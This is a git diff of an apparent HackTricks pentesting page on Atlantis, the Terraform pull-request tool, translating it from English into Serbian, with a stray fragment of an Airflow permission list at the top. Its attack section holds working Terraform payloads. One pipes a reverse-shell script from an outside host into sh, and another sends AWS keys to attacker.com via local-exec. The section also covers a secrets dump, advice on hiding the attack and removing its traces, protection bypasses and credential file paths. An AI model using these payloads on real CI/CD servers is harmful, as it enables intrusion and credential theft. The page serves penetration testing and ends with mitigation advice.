čitati na My Profile, može uređivati na My Profile, može čitati na SLA Misses, može čitati na Task Logs, može čitati na Website, pristup meniju na Browse, pristup meniju na DAG Dependencies, pristup meniju na DAG Runs, pristup meniju na Documentation, pristup meniju na Docs, pristup meniju na Jobs, pristup meniju na Audit Logs, pristup meniju na Plugins, pristup meniju na SLA Misses, pristup meniju na Task Instances] - **Public** \[] {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/atlantis-security.md b/src/pentesting-ci-cd/atlantis-security.md index a4b35140f..4392e90bc 100644 --- a/src/pentesting-ci-cd/atlantis-security.md +++ b/src/pentesting-ci-cd/atlantis-security.md @@ -4,109 +4,109 @@ ### Basic Information -Atlantis basically helps you to to run terraform from Pull Requests from your git server. +Atlantis u suštini pomaže da pokrenete terraform iz Pull Requests sa vašeg git servera. ![](<../images/image (161).png>) ### Local Lab -1. Go to the **atlantis releases page** in [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) and **download** the one that suits you. -2. Create a **personal token** (with repo access) of your **github** user -3. Execute `./atlantis testdrive` and it will create a **demo repo** you can use to **talk to atlantis** - 1. You can access the web page in 127.0.0.1:4141 +1. Idite na **atlantis releases page** na [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) i **preuzmite** onaj koji vam odgovara. +2. Kreirajte **lični token** (sa pristupom repozitorijumu) vašeg **github** korisnika. +3. Izvršite `./atlantis testdrive` i to će kreirati **demo repo** koji možete koristiti da **komunicirate sa atlantisom**. +1. Možete pristupiti web stranici na 127.0.0.1:4141. ### Atlantis Access #### Git Server Credentials -**Atlantis** support several git hosts such as **Github**, **Gitlab**, **Bitbucket** and **Azure DevOps**.\ -However, in order to access the repos in those platforms and perform actions, it needs to have some **privileged access granted to them** (at least write permissions).\ -[**The docs**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) encourage to create a user in these platform specifically for Atlantis, but some people might use personal accounts. +**Atlantis** podržava nekoliko git hostova kao što su **Github**, **Gitlab**, **Bitbucket** i **Azure DevOps**.\ +Međutim, da bi se pristupilo repozitorijumima na tim platformama i izvršavale akcije, potrebno je da se dodeli neki **privilegovan pristup** (barem prava za pisanje).\ +[**Dokumentacija**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) preporučuje da se kreira korisnik na ovim platformama posebno za Atlantis, ali neki ljudi mogu koristiti lične naloge. > [!WARNING] -> In any case, from an attackers perspective, the **Atlantis account** is going to be one very **interesting** **to compromise**. +> U svakom slučaju, iz perspektive napadača, **Atlantis nalog** će biti veoma **interesantan** **za kompromitovanje**. #### Webhooks -Atlantis uses optionally [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) to validate that the **webhooks** it receives from your Git host are **legitimate**. +Atlantis koristi opcionalno [**Webhook tajne**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) da bi potvrdio da su **webhookovi** koje prima sa vašeg Git hosta **legitimni**. -One way to confirm this would be to **allowlist requests to only come from the IPs** of your Git host but an easier way is to use a Webhook Secret. +Jedan način da to potvrdite bio bi da **dozvolite zahteve da dolaze samo sa IP adresa** vašeg Git hosta, ali lakši način je korišćenje Webhook Tajne. -Note that unless you use a private github or bitbucket server, you will need to expose webhook endpoints to the Internet. +Napomena: osim ako ne koristite privatni github ili bitbucket server, moraćete da izložite webhook krajnje tačke internetu. > [!WARNING] -> Atlantis is going to be **exposing webhooks** so the git server can send it information. From an attackers perspective it would be interesting to know **if you can send it messages**. +> Atlantis će **izlagati webhookove** kako bi git server mogao da mu šalje informacije. Iz perspektive napadača, bilo bi zanimljivo znati **da li možete slati poruke**. #### Provider Credentials -[From the docs:](https://www.runatlantis.io/docs/provider-credentials.html) +[Iz dokumentacije:](https://www.runatlantis.io/docs/provider-credentials.html) -Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** commands on the server **Atlantis is hosted on**. Just like when you run Terraform locally, Atlantis needs credentials for your specific provider. +Atlantis pokreće Terraform jednostavno **izvršavajući `terraform plan` i `apply`** komande na serveru **na kojem je Atlantis hostovan**. Baš kao kada pokrećete Terraform lokalno, Atlantis treba kredencijale za vaš specifični provajder. -It's up to you how you [provide credentials](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) for your specific provider to Atlantis: +Na vama je kako [obezbeđujete kredencijale](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) za vaš specifični provajder Atlantsu: -- The Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) and [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) have their own mechanisms for provider credentials. Read their docs. -- If you're running Atlantis in a cloud then many clouds have ways to give cloud API access to applications running on them, ex: - - [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Search for "EC2 Role") - - [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference) -- Many users set environment variables, ex. `AWS_ACCESS_KEY`, where Atlantis is running. -- Others create the necessary config files, ex. `~/.aws/credentials`, where Atlantis is running. -- Use the [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) to obtain provider credentials. +- Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) i [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) imaju svoje mehanizme za kredencijale provajdera. Pročitajte njihovu dokumentaciju. +- Ako pokrećete Atlantis u oblaku, mnogi oblaci imaju načine da daju pristup API-ju oblaka aplikacijama koje se na njima pokreću, npr: +- [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Pretražite "EC2 Role") +- [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference) +- Mnogi korisnici postavljaju promenljive okruženja, npr. `AWS_ACCESS_KEY`, gde se Atlantis pokreće. +- Drugi kreiraju potrebne konfiguracione datoteke, npr. `~/.aws/credentials`, gde se Atlantis pokreće. +- Koristite [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) da dobijete kredencijale provajdera. > [!WARNING] -> The **container** where **Atlantis** is **running** will highly probably **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform. +> **Kontejner** u kojem **Atlantis** **radi** će verovatno **sadržati privilegovane kredencijale** za provajdere (AWS, GCP, Github...) koje Atlantis upravlja putem Terraforma. #### Web Page -By default Atlantis will run a **web page in the port 4141 in localhost**. This page just allows you to enable/disable atlantis apply and check the plan status of the repos and unlock them (it doesn't allow to modify things, so it isn't that useful). +Podrazumevano, Atlantis će pokrenuti **web stranicu na portu 4141 na localhostu**. Ova stranica samo omogućava da omogućite/isključite atlantis apply i proverite status plana repozitorijuma i otključate ih (ne dozvoljava da se stvari menjaju, tako da nije toliko korisna). -You probably won't find it exposed to the internet, but it looks like by default **no credentials are needed** to access it (and if they are `atlantis`:`atlantis` are the **default** ones). +Verovatno je nećete naći izloženu internetu, ali izgleda da podrazumevano **nema potrebnih kredencijala** za pristup (a ako ih ima, `atlantis`:`atlantis` su **podrazumevani**). ### Server Configuration -Configuration to `atlantis server` can be specified via command line flags, environment variables, a config file or a mix of the three. +Konfiguracija za `atlantis server` može se specificirati putem komandnih linijskih zastavica, promenljivih okruženja, konfiguracione datoteke ili kombinacije tri. -- You can find [**here the list of flags**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) supported by Atlantis server -- You can find [**here how to transform a config option into an env var**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables) +- Možete pronaći [**ovde listu zastavica**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) koje podržava Atlantis server. +- Možete pronaći [**ovde kako da transformišete opciju konfiguracije u env var**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables). -Values are **chosen in this order**: +Vrednosti se **biraju u ovom redosledu**: -1. Flags -2. Environment Variables -3. Config File +1. Zastavice +2. Promenljive okruženja +3. Konfiguraciona datoteka > [!WARNING] -> Note that in the configuration you might find interesting values such as **tokens and passwords**. +> Napomena: u konfiguraciji možete pronaći zanimljive vrednosti kao što su **tokeni i lozinke**. #### Repos Configuration -Some configurations affects **how the repos are managed**. However, it's possible that **each repo require different settings**, so there are ways to specify each repo. This is the priority order: +Neke konfiguracije utiču na **kako se upravlja repozitorijumima**. Međutim, moguće je da **svaki repo zahteva različite postavke**, tako da postoje načini da se specificira svaki repo. Ovo je redosled prioriteta: -1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) file. This file can be used to specify how atlantis should treat the repo. However, by default some keys cannot be specified here without some flags allowing it. - 1. Probably required to be allowed by flags like `allowed_overrides` or `allow_custom_workflows` -2. [**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config): You can pass it with the flag `--repo-config` and it's a yaml configuring new settings for each repo (regexes supported) -3. **Default** values +1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) datoteka. Ova datoteka se može koristiti da specificira kako atlantis treba da tretira repo. Međutim, podrazumevano neke ključeve nije moguće specificirati ovde bez nekih zastavica koje to omogućavaju. +1. Verovatno je potrebno da bude dozvoljeno zastavicama kao što su `allowed_overrides` ili `allow_custom_workflows`. +2. [**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config): Možete je proslediti sa zastavicom `--repo-config` i to je yaml koji konfiguriše nove postavke za svaki repo (regexi su podržani). +3. **Podrazumevane** vrednosti. **PR Protections** -Atlantis allows to indicate if you want the **PR** to be **`approved`** by somebody else (even if that isn't set in the branch protection) and/or be **`mergeable`** (branch protections passed) **before running apply**. From a security point of view, to set both options a recommended. +Atlantis omogućava da naznačite da li želite da **PR** bude **`odobren`** od strane nekog drugog (čak i ako to nije postavljeno u zaštiti grane) i/ili da bude **`spajivo`** (zaštite grane su prošle) **pre nego što se izvrši apply**. Sa stanovišta bezbednosti, preporučuje se postaviti obe opcije. -In case `allowed_overrides` is True, these setting can be **overwritten on each project by the `/atlantis.yml` file**. +U slučaju da je `allowed_overrides` True, ova podešavanja mogu biti **prepisana u svakom projektu putem datoteke `/atlantis.yml`**. **Scripts** -The repo config can **specify scripts** to run [**before**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage) (_pre workflow hooks_) and [**after**](https://www.runatlantis.io/docs/post-workflow-hooks.html) (_post workflow hooks_) a **workflow is executed.** +Konfiguracija repozitorijuma može **specificirati skripte** koje će se izvršiti [**pre**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage) (_pre workflow hooks_) i [**posle**](https://www.runatlantis.io/docs/post-workflow-hooks.html) (_post workflow hooks_) kada se **workflow izvrši.** -There isn't any option to allow **specifying** these scripts in the **repo `/atlantis.yml`** file. +Ne postoji opcija da se **specificiraju** ove skripte u **repo `/atlantis.yml`** datoteci. **Workflow** -In the repo config (server side config) you can [**specify a new default workflow**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), or [**create new custom workflows**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** You can also **specify** which **repos** can **access** the **new** ones generated.\ -Then, you can allow the **atlantis.yaml** file of each repo to **specify the workflow to use.** +U konfiguraciji repozitorijuma (server side config) možete [**specificirati novi podrazumevani workflow**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), ili [**kreirati nove prilagođene workflow-e**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** Takođe možete **specificirati** koji **repozi** mogu **pristupiti** novim generisanim.\ +Zatim, možete dozvoliti **atlantis.yaml** datoteci svakog repozitorijuma da **specificira workflow koji će se koristiti.** > [!CAUTION] -> If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used.\ -> This will basically give **RCE in the Atlantis server to any user that can access that repo**. +> Ako je [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) zastavica `allow_custom_workflows` postavljena na **True**, workflow-i se mogu **specificirati** u **`atlantis.yaml`** datoteci svakog repozitorijuma. Takođe je potencijalno potrebno da **`allowed_overrides`** takođe specificira **`workflow`** da **prepiše workflow** koji će se koristiti.\ +> Ovo će u osnovi dati **RCE u Atlantis server svakom korisniku koji može pristupiti tom repozitorijumu**. > > ```yaml > # atlantis.yaml @@ -126,19 +126,18 @@ Then, you can allow the **atlantis.yaml** file of each repo to **specify the wor **Conftest Policy Checking** -Atlantis supports running **server-side** [**conftest**](https://www.conftest.dev/) **policies** against the plan output. Common usecases for using this step include: +Atlantis podržava pokretanje **server-side** [**conftest**](https://www.conftest.dev/) **politika** protiv izlaza plana. Uobičajeni slučajevi korišćenja ovog koraka uključuju: -- Denying usage of a list of modules -- Asserting attributes of a resource at creation time -- Catching unintentional resource deletions -- Preventing security risks (ie. exposing secure ports to the public) +- Odbijanje korišćenja liste modula. +- Potvrđivanje atributa resursa u trenutku kreiranja. +- Hvatanje nenamernih brisanja resursa. +- Sprečavanje bezbednosnih rizika (npr. izlaganje sigurnih portova javnosti). -You can check how to configure it in [**the docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works). +Možete proveriti kako to konfigurisati u [**dokumentaciji**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works). ### Atlantis Commands -[**In the docs**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) you can find the options you can use to run Atlantis: - +[**U dokumentaciji**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) možete pronaći opcije koje možete koristiti za pokretanje Atlantisa: ```bash # Get help atlantis help @@ -161,94 +160,82 @@ atlantis apply [options] -- [terraform apply flags] ## --verbose ## You can also add extra terraform options ``` - -### Attacks +### Napadi > [!WARNING] -> If during the exploitation you find this **error**: `Error: Error acquiring the state lock` - -You can fix it by running: +> Ako tokom eksploatacije naiđete na ovu **grešku**: `Error: Error acquiring the state lock` +Možete to popraviti pokretanjem: ``` atlantis unlock #You might need to run this in a different PR atlantis plan -- -lock=false ``` +#### Atlantis plan RCE - Modifikacija konfiguracije u novom PR-u -#### Atlantis plan RCE - Config modification in new PR - -If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis plan`** (or maybe it's automatically executed) **you will be able to RCE inside the Atlantis server**. - -You can do this by making [**Atlantis load an external data source**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source). Just put a payload like the following in the `main.tf` file: +Ako imate pristup za pisanje u repozitorijum, moći ćete da kreirate novu granu i generišete PR. Ako možete **izvršiti `atlantis plan`** (ili možda se automatski izvršava) **moći ćete da RCE unutar Atlantis servera**. +Možete to uraditi tako što ćete [**naterati Atlantis da učita spoljašnji izvor podataka**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source). Samo stavite payload kao što je sledeći u `main.tf` datoteku: ```json data "external" "example" { - program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"] +program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"] } ``` +**Tajni napad** -**Stealthier Attack** - -You can perform this attack even in a **stealthier way**, by following this suggestions: - -- Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell: +Možete izvesti ovaj napad čak i na **tajniji način**, prateći ove sugestije: +- Umesto da direktno dodate rev shell u terraform datoteku, možete **učitati spoljašnji resurs** koji sadrži rev shell: ```javascript module "not_rev_shell" { - source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules" +source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules" } ``` +Možete pronaći rev shell kod na [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules) -You can find the rev shell code in [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules) - -- In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b` -- **Instead** of creating a **PR to master** to trigger Atlantis, **create 2 branches** (test1 and test2) and create a **PR from one to the other**. When you have completed the attack, just **remove the PR and the branches**. +- U spoljnim resursima, koristite **ref** funkciju da sakrijete **terraform rev shell kod u grani** unutar repozitorijuma, nešto poput: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b` +- **Umesto** kreiranja **PR za master** da pokrenete Atlantis, **napravite 2 grane** (test1 i test2) i kreirajte **PR od jedne do druge**. Kada završite napad, samo **uklonite PR i grane**. #### Atlantis plan Secrets Dump -You can **dump secrets used by terraform** running `atlantis plan` (`terraform plan`) by putting something like this in the terraform file: - +Možete **dumpovati tajne koje koristi terraform** pokretanjem `atlantis plan` (`terraform plan`) tako što ćete staviti nešto poput ovoga u terraform datoteku: ```json output "dotoken" { - value = nonsensitive(var.do_token) +value = nonsensitive(var.do_token) } ``` +#### Atlantis apply RCE - Modifikacija konfiguracije u novom PR-u -#### Atlantis apply RCE - Config modification in new PR +Ako imate pristup za pisanje u repozitorijum, moći ćete da kreirate novu granu i generišete PR. Ako možete **izvršiti `atlantis apply`, moći ćete da RCE unutar Atlantis servera**. -If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis apply` you will be able to RCE inside the Atlantis server**. +Međutim, obično ćete morati da zaobiđete neke zaštite: -However, you will usually need to bypass some protections: - -- **Mergeable**: If this protection is set in Atlantis, you can only run **`atlantis apply` if the PR is mergeable** (which means that the branch protection need to be bypassed). - - Check potential [**branch protections bypasses**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md) -- **Approved**: If this protection is set in Atlantis, some **other user must approve the PR** before you can run `atlantis apply` - - By default you can abuse the [**Gitbot token to bypass this protection**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md) - -Running **`terraform apply` on a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\ -You just need to make sure some payload like the following ones ends in the `main.tf` file: +- **Mergeable**: Ako je ova zaštita postavljena u Atlantis-u, možete pokrenuti **`atlantis apply` samo ako je PR spojiv** (što znači da zaštita grane mora biti zaobiđena). +- Proverite potencijalne [**zaštite grane zaobilaženja**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md) +- **Approved**: Ako je ova zaštita postavljena u Atlantis-u, neki **drugi korisnik mora odobriti PR** pre nego što možete pokrenuti `atlantis apply` +- Po defaultu možete zloupotrebiti [**Gitbot token da zaobiđete ovu zaštitu**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md) +Pokretanje **`terraform apply` na malicioznom Terraform fajlu sa** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\ +Samo treba da se pobrinete da neki payload poput sledećih završi u `main.tf` fajlu: ```json // Payload 1 to just steal a secret resource "null_resource" "secret_stealer" { - provisioner "local-exec" { - command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY" - } +provisioner "local-exec" { +command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY" +} } // Payload 2 to get a rev shell resource "null_resource" "rev_shell" { - provisioner "local-exec" { - command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'" - } +provisioner "local-exec" { +command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'" +} } ``` - -Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way**. +Sledite **preporukama iz prethodne tehnike** da izvršite ovaj napad na **diskretniji način**. #### Terraform Param Injection -When running `atlantis plan` or `atlantis apply` terraform is being run under-needs, you can pass commands to terraform from atlantis commenting something like: - +Kada pokrećete `atlantis plan` ili `atlantis apply`, terraform se pokreće ispod, možete proslediti komande terraformu iz atlantisa komentarišući nešto poput: ```bash atlantis plan -- atlantis plan -- -h #Get terraform plan help @@ -256,18 +243,17 @@ atlantis plan -- -h #Get terraform plan help atlantis apply -- atlantis apply -- -h #Get terraform apply help ``` - Something you can pass are env variables which might be helpful to bypass some protections. Check terraform env vars in [https://www.terraform.io/cli/config/environment-variables](https://www.terraform.io/cli/config/environment-variables) #### Custom Workflow -Running **malicious custom build commands** specified in an `atlantis.yaml` file. Atlantis uses the `atlantis.yaml` file from the pull request branch, **not** of `master`.\ -This possibility was mentioned in a previous section: +Pokretanje **malicious custom build commands** specificiranih u `atlantis.yaml` datoteci. Atlantis koristi `atlantis.yaml` datoteku iz grane pull request-a, **ne** iz `master`.\ +Ova mogućnost je pomenuta u prethodnom odeljku: > [!CAUTION] -> If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used. +> Ako je [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) zastavica `allow_custom_workflows` postavljena na **True**, radni tokovi mogu biti **specificirani** u **`atlantis.yaml`** datoteci svake repozitorije. Takođe je potencijalno potrebno da **`allowed_overrides`** takođe specificira **`workflow`** da **prepiše radni tok** koji će se koristiti. > -> This will basically give **RCE in the Atlantis server to any user that can access that repo**. +> Ovo će u osnovi dati **RCE na Atlantis serveru bilo kojem korisniku koji može pristupiti toj repozitoriji**. > > ```yaml > # atlantis.yaml @@ -288,97 +274,95 @@ This possibility was mentioned in a previous section: #### Bypass plan/apply protections -If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allowed_overrides` _has_ `apply_requirements` configured, it's possible for a repo to **modify the plan/apply protections to bypass them**. - +Ako je [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) zastavica `allowed_overrides` _konfigurisana_ sa `apply_requirements`, moguće je da repozitorija **modifikuje plan/apply zaštite da ih zaobiđe**. ```yaml repos: - - id: /.*/ - apply_requirements: [] +- id: /.*/ +apply_requirements: [] ``` - #### PR Hijacking -If someone sends **`atlantis plan/apply` comments on your valid pull requests,** it will cause terraform to run when you don't want it to. +Ako neko pošalje **`atlantis plan/apply` komentare na vašim validnim pull zahtevima,** to će uzrokovati da terraform radi kada to ne želite. -Moreover, if you don't have configured in the **branch protection** to ask to **reevaluate** every PR when a **new commit is pushed** to it, someone could **write malicious configs** (check previous scenarios) in the terraform config, run `atlantis plan/apply` and gain RCE. +Štaviše, ako nemate podešeno u **zaštiti grane** da traži da se **ponovo proceni** svaki PR kada se **novi commit pošalje** na njega, neko bi mogao da **napisuje zloćudne konfiguracije** (proverite prethodne scenarije) u terraform konfiguraciji, pokrene `atlantis plan/apply` i dobije RCE. -This is the **setting** in Github branch protections: +Ovo je **podešavanje** u Github zaštitama grana: ![](<../images/image (216).png>) #### Webhook Secret -If you manage to **steal the webhook secret** used or if there **isn't any webhook secret** being used, you could **call the Atlantis webhook** and **invoke atlatis commands** directly. +Ako uspete da **ukradete webhook secret** koji se koristi ili ako **nema webhook secret** koji se koristi, mogli biste **pozvati Atlantis webhook** i **izvršiti atlantis komande** direktno. #### Bitbucket -Bitbucket Cloud does **not support webhook secrets**. This could allow attackers to **spoof requests from Bitbucket**. Ensure you are allowing only Bitbucket IPs. +Bitbucket Cloud **ne podržava webhook secrets**. Ovo bi moglo omogućiti napadačima da **lažiraju zahteve iz Bitbucket-a**. Osigurajte da dozvoljavate samo Bitbucket IP adrese. -- This means that an **attacker** could make **fake requests to Atlantis** that look like they're coming from Bitbucket. -- If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos. -- To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses). +- To znači da bi **napadač** mogao da napravi **lažne zahteve ka Atlantis-u** koji izgledaju kao da dolaze iz Bitbucket-a. +- Ako specificirate `--repo-allowlist`, onda bi mogli samo da lažiraju zahteve koji se odnose na te repozitorijume, tako da bi najveća šteta koju bi mogli da naprave bila planiranje/aplikacija na vašim repozitorijumima. +- Da biste to sprečili, dozvolite [IP adrese Bitbucket-a](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (vidi Izlazne IPv4 adrese). ### Post-Exploitation -If you managed to get access to the server or at least you got a LFI there are some interesting things you should try to read: +Ako ste uspeli da dobijete pristup serveru ili barem ste dobili LFI, postoje neke zanimljive stvari koje biste trebali pokušati da pročitate: -- `/home/atlantis/.git-credentials` Contains vcs access credentials -- `/atlantis-data/atlantis.db` Contains vcs access credentials with more info -- `/atlantis-data/repos/`_`/`_`////.terraform/terraform.tfstate` Terraform stated file - - Example: /atlantis-data/repos/ghOrg\_/_myRepo/20/default/env/prod/.terraform/terraform.tfstate -- `/proc/1/environ` Env variables -- `/proc/[2-20]/cmdline` Cmd line of `atlantis server` (may contain sensitive data) +- `/home/atlantis/.git-credentials` Sadrži vcs pristupne akreditive +- `/atlantis-data/atlantis.db` Sadrži vcs pristupne akreditive sa više informacija +- `/atlantis-data/repos/`_`/`_`////.terraform/terraform.tfstate` Terraform stanje datoteke +- Primer: /atlantis-data/repos/ghOrg\_/_myRepo/20/default/env/prod/.terraform/terraform.tfstate +- `/proc/1/environ` Env varijable +- `/proc/[2-20]/cmdline` Cmd linija `atlantis server` (može sadržati osetljive podatke) ### Mitigations #### Don't Use On Public Repos -Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos without proper configuration of the security settings. +Zato što bilo ko može komentarisati na javnim pull zahtevima, čak i sa svim dostupnim bezbednosnim mitigacijama, i dalje je opasno pokretati Atlantis na javnim repozitorijumima bez pravilne konfiguracije bezbednosnih podešavanja. #### Don't Use `--allow-fork-prs` -If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false) because anyone can open up a pull request from their fork to your repo. +Ako radite na javnom repozitorijumu (što nije preporučljivo, vidi iznad), ne biste trebali postaviti `--allow-fork-prs` (podrazumevano je false) jer bilo ko može otvoriti pull zahtev iz svog fork-a ka vašem repozitorijumu. #### `--repo-allowlist` -Atlantis requires you to specify a allowlist of repositories it will accept webhooks from via the `--repo-allowlist` flag. For example: +Atlantis zahteva da navedete listu dozvoljenih repozitorijuma sa kojih će prihvatati webhooks putem `--repo-allowlist` zastavice. Na primer: -- Specific repositories: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests` -- Your whole organization: `--repo-allowlist=github.com/runatlantis/*` -- Every repository in your GitHub Enterprise install: `--repo-allowlist=github.yourcompany.com/*` -- All repositories: `--repo-allowlist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret. +- Specifični repozitorijumi: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests` +- Cela vaša organizacija: `--repo-allowlist=github.com/runatlantis/*` +- Svaki repozitorijum u vašem GitHub Enterprise instalaciji: `--repo-allowlist=github.yourcompany.com/*` +- Svi repozitorijumi: `--repo-allowlist=*`. Korisno kada ste u zaštićenoj mreži, ali opasno bez takođe postavljenog webhook secret-a. -This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details. +Ova zastavica osigurava da vaša Atlantis instalacija nije korišćena sa repozitorijumima koje ne kontrolišete. Vidi `atlantis server --help` za više detalja. #### Protect Terraform Planning -If attackers submitting pull requests with malicious Terraform code is in your threat model then you must be aware that `terraform apply` approvals are not enough. It is possible to run malicious code in a `terraform plan` using the [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source) or by specifying a malicious provider. This code could then exfiltrate your credentials. +Ako su napadači koji šalju pull zahteve sa zloćudnim Terraform kodom u vašem modelu pretnje, onda morate biti svesni da odobrenja za `terraform apply` nisu dovoljna. Moguće je pokrenuti zloćudni kod u `terraform plan` koristeći [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source) ili specificirajući zloćudnog provajdera. Ovaj kod bi mogao da exfiltrira vaše akreditive. -To prevent this, you could: +Da biste to sprečili, mogli biste: -1. Bake providers into the Atlantis image or host and deny egress in production. -2. Implement the provider registry protocol internally and deny public egress, that way you control who has write access to the registry. -3. Modify your [server-side repo configuration](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` step to validate against the use of disallowed providers or data sources or PRs from not allowed users. You could also add in extra validation at this point, e.g. requiring a "thumbs-up" on the PR before allowing the `plan` to continue. Conftest could be of use here. +1. Ugraditi provajdere u Atlantis sliku ili hostovati i odbiti izlaz u produkciji. +2. Implementirati protokol za registraciju provajdera interno i odbiti javni izlaz, tako da kontrolišete ko ima pristup za pisanje u registru. +3. Izmeniti vašu [server-side repo konfiguraciju](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` korak da validira upotrebu zabranjenih provajdera ili data source-ova ili PR-ova od neodobrenih korisnika. Takođe možete dodati dodatnu validaciju u ovom trenutku, npr. zahtevajući "thumbs-up" na PR pre nego što dozvolite da `plan` nastavi. Conftest bi mogao biti od 